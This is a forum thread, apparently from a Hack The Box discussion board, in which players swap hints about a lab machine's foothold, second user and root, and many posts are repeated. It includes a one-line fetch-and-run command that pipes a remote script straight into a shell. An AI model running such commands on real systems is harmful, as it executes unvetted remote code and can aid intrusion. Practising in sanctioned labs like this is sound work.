Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.
Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.
Many Thanks, Taz
I doubt that DNS enum/fuzzing will get you anywhere. You should rather investigate data you send to and receive from the server.
Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling.
Have you visited the site in a browser?
Have you run a directory busting tool? (I found gobuster better than dirb here but YMMV).
If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.
My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.
My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.
HTB doesn't tend to use DNS.
Many Thanks, Taz
Hi
Hey fellow Taz
Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, i`ll let you know how I get on!
Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, i`ll let you know how I get on!
Awersome.
A small change on one POST request should allow you access a page you couldn't access before. That holds a wealth of useful information.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.
Had to use a local tool I'd never heard of before. Feel free to PM for nudges but let me know what you've already tried. Plenty of hints for foothold and first user through the thread
Hello friends I hope that you are doing great out there. I'm stuck with root. When I try to run the script c******* run-script command I was ended up with this error Script "command" is not defined in this package. Any solution or hint appreciated.
I was able to escalate my privs on the webpage but I don't fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advanced!
Rooted. The hardest part was definitely getting that 2nd user. Foothold wasn't too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. That's what did it for me.
I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure its got to be something even more simple than what I'm attempting...
I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure its got to be something even more simple than what I'm attempting...
It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Comments
need a hint with root, going through /var/log but i can't get clue to root this box.
Type your comment> @0xstain said:
Are you going through /var/log with the user with user.txt in his home folder?
removed by user
Hello Guys and Gals,
Could someone possibley help me with the Foothold - Ive found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is defiantly DNS Enumuration so this could possibly be my weakness here.
Many Thanks, Taz
@TaZ0w said:
I doubt that DNS enum/fuzzing will get you anywhere. You should rather investigate data you send to and receive from the server.
GREM | OSCE | GASF | eJPT
@TaZ0w said:
Have you visited the site in a browser?
Have you run a directory busting tool? (I found gobuster better than dirb here but YMMV).
If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.
HTB doesn't tend to use DNS.
Hi
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Type your comment> @TazWake said:
Hey fellow Taz
Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, i`ll let you know how I get on!
T
Type your comment> @TazWake said:
Jesus, thanks man - Its amazing how simple some things can be - ive spent liturally 2 hours on DNS today and it was as simple as the r****d
i now have the sub domain, so onwards and upwards!
@TaZ0w said:
Awersome.
A small change on one POST request should allow you access a page you couldn't access before. That holds a wealth of useful information.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
edit: nevermind, i got it
i will @benjamin2000
For anyone who reads this: use
mktemp -dto create a temporal directory and stop downloading your scripts on /home directory@Feror said:
There's no need to even download the scripts to disk, you can simply
curl http://ip:port/script.sh | sh(orwget -O - ...whencurlisn't available)GREM | OSCE | GASF | eJPT
So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.
Had to use a local tool I'd never heard of before. Feel free to PM for nudges but let me know what you've already tried. Plenty of hints for foothold and first user through the thread
Really funny box, if anyone get stuck on log files, update your enum script version and try again(it took my 2 hour
)
Thanks for this box
Rooted
You can pm me on discord sh4d0wless#6154
Type your comment> @tsheva said:
yes i have user not www-data.
Hello friends I hope that you are doing great out there. I'm stuck with root. When I try to run the script c******* run-script command I was ended up with this error Script "command" is not defined in this package. Any solution or hint appreciated.
Finally rooted! if anyone needs a nudge PM me
fun box
Finally made it. Feel free to PM for a nudge.
rooted, need a nudge? just pm.
Rooted now, learned some things doing this box!
What a traumatic machine... I was soo frustrated, that I was going to skip this machine. Thanks to @IvanV who motivated me to go on.
Lesson learned: Even when you think you know how to retrieve things, GOOGLE IT!!!! 😂
Anyone do the user part manually?
I was able to escalate my privs on the webpage but I don't fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advanced!
Rooted the machine, it was really fun box, learned alot.
PM for nudge, good luck
Rooted. The hardest part was definitely getting that 2nd user. Foothold wasn't too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. That's what did it for me.
I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure its got to be something even more simple than what I'm attempting...
@Sc0rp10ne said:
It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.